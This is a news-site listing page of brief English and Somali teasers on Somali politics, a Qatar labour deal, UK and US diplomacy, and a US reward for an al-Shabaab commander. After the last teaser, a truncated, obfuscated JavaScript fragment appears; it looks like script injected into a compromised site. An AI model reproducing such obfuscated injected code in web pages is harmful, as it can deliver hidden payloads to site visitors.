US urges inclusive political process in Somalia amid regional tensions
MOGADISHU, May 10, 2025 – The United States on Friday urged Somalia to ensure that all relevant stakeholders are included in ongoing efforts to reform the country’s federal and electoral systems, warning that decisions made without a broad-based consensus risk undermining legitimacy and distracting from critical security priorities.
The call, issued by the U.S. State Department’s Bureau of African Affairs,...
MAQAAL: Ku Xadgudubka Sharci ee Golaha Wadatashiga Qaranka (NCC)
Maqaalkani wuxuu falanqeynayaa xadgudubyada sharci ee ay sameeyeen xubnaha GolahaWadatashiga Qaranka (NCC) ee Soomaaliya, kuwaas oo iclaamiyey 7-da May 2025 inay kudhawaaqayaan inay sameysteen xisbi siyaasadeed iyagoo aan haysan oggolaansho sharci ah. Tani waxay ka hor imaaneysaa ujeedadii asalka ahayd ee golaha, taas oo ahayd in la helomadal wadatashi oo lagu xalliyo khilaafaadka siyaasadeed ee u dhexeeya Dowladda Federaalka...
Soomaaliya oo in ka badan 10,000 shaqaale ah u diraysa Qatar
DOHA, Qatar, 9 May 2025 – Dowladaha Soomaaliya iyo Qatar ayaa kala saxiixday heshiis shaqo oo la filayo inuu horseedo shaqaaleysiinta in ka badan 10,000 dhalinyaro Soomaaliyeed oo isugu jira xirfadlayaal iyo shaqaale aan xirfad lahayn, sida ay werisay warbaahinta dowladda Soomaaliya maalintii Jimcaha.
Heshiiskan ayaa lagu dhawaaqay kaddib booqasho rasmi ah oo uu wafdi ka socda dowladda Soomaaliya ku tagay...
Somalia, Qatar sign labour deal to send over 10,000 workers to Gulf state
DOHA, Qatar, May 9, 2025 – Somalia and Qatar have reached an agreement expected to pave the way for the employment of more than 10,000 Somali youth in the Gulf state, Somalia’s state media reported on Friday.
The deal, which includes both skilled and unskilled workers, was announced following a visit to Doha by a delegation from the federal government...
Madaxweynaha Soomaaliya oo la kulmay Wafdi ka socda UK si loo xoojiyo iskaashiga amniga iyo siyaasadda
MUQDISHO, 9 May – Madaxweynaha Soomaaliya, Xasan Sheekh Maxamuud, ayaa maanta ku qaabilay magaalada Muqdisho Ms. Harriet Mathews, Agaasimaha Guud ee Waaxda Afrika iyo Ameerikada ee Wasaaradda Arrimaha Dibadda iyo Horumarinta UK (FCDO), si ay uga wada hadlaan xoojinta iskaashiga labada dal ee dhinacyada amniga, siyaasadda, iyo horumarinta guud.
Kulankan ayaa diiradda lagu saaray hawlgalka Ajaanibta ee Midowga Afrika ee...
Somali president meets UK FCDO Africa chief to deepen security, political cooperation
MOGADISHU, May 9 – Somali President Hassan Sheikh Mohamud on Thursday received Ms. Harriet Mathews, the UK Foreign, Commonwealth & Development Office (FCDO) Director General for Africa and the Americas, in Mogadishu for a high-level meeting aimed at strengthening bilateral relations and consolidating progress in Somalia’s security and political sectors.
According to the Somali presidency, the talks were “productive and...
Mareykanka oo ku bixinaya $10 milyan xog lagu soo qaban karo hogaamiye Al-Shabaab
NAIROBI, 8 May – Dowladda Mareykanka ayaa shaacisay in ay bixineyso abaalmarin gaaraysa ilaa $10 milyan oo doollar cid kasta oo keenta xog horseedi karta qabashada ama xukminta Cabdullaahi Banati, oo ah sarkaal sare oo ka tirsan kooxda Al-Shabaab.
Wasaaradda Arrimaha Dibadda ee Mareykanka ayaa Talaadadii sheegtay in Banati uu door weyn ka qaatay qorsheynta iyo fulinta weerarkii 5-tii Janaayo...
U.S. Offers $10 Mln Reward for al-Shabaab Leader Linked to Kenya Base Attack
NAIROBI, May 8 – The United States is offering a reward of up to $10 million for information leading to the arrest or conviction of Abdullahi Banati, a senior commander of the militant group al-Shabaab, who is accused of masterminding a deadly attack on a U.S. military base in Kenya in 2020.
The U.S. Department of State made the announcement...
Farmaajo Accuses Hassan Sheikh of Undermining Somalia’s Statebuilding Through Partisan Politics
Mogadishu, Somalia – May 8, 2025 - Former Somali President Mohamed Abdullahi Farmaajo has issued a sharp rebuke of current President Hassan Sheikh Mohamud, accusing him of compromising Somalia’s statebuilding process for political gain.
In a statement shared on social media, Farmaajo claimed that the National Consultative Council (NCC) — a key body formed to guide Somalia’s federalization and governance...
Farmaajo: Qorshaha Xasan Sheekh wuxuu halis ku yahay midnimadda umadda Soomaaliyeed
MUQDISHO, Soomaaliya - Madaxweynihii hore ee Soomaaliya Maxamed Cabdullahi Farmaajo ayaa soo saarey war-saxaafadeed uu dhaliilo ugu jeediyay Madaxweyne Xasan Sheekh Maxamuud.
Farmaajo ayaa damac waali ah ku tilmaamay qorshaha uu wado Madaxweynaha uu waqtigu kasii dhamaanayo ee Xasan Sheekh Maxamuud ee xukunka inuu gacantiisa kusoo aruuriyo iyo inuu u bedelo Gollaha Wadatashiga Qaran xisbi isagu leeyahay.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let...








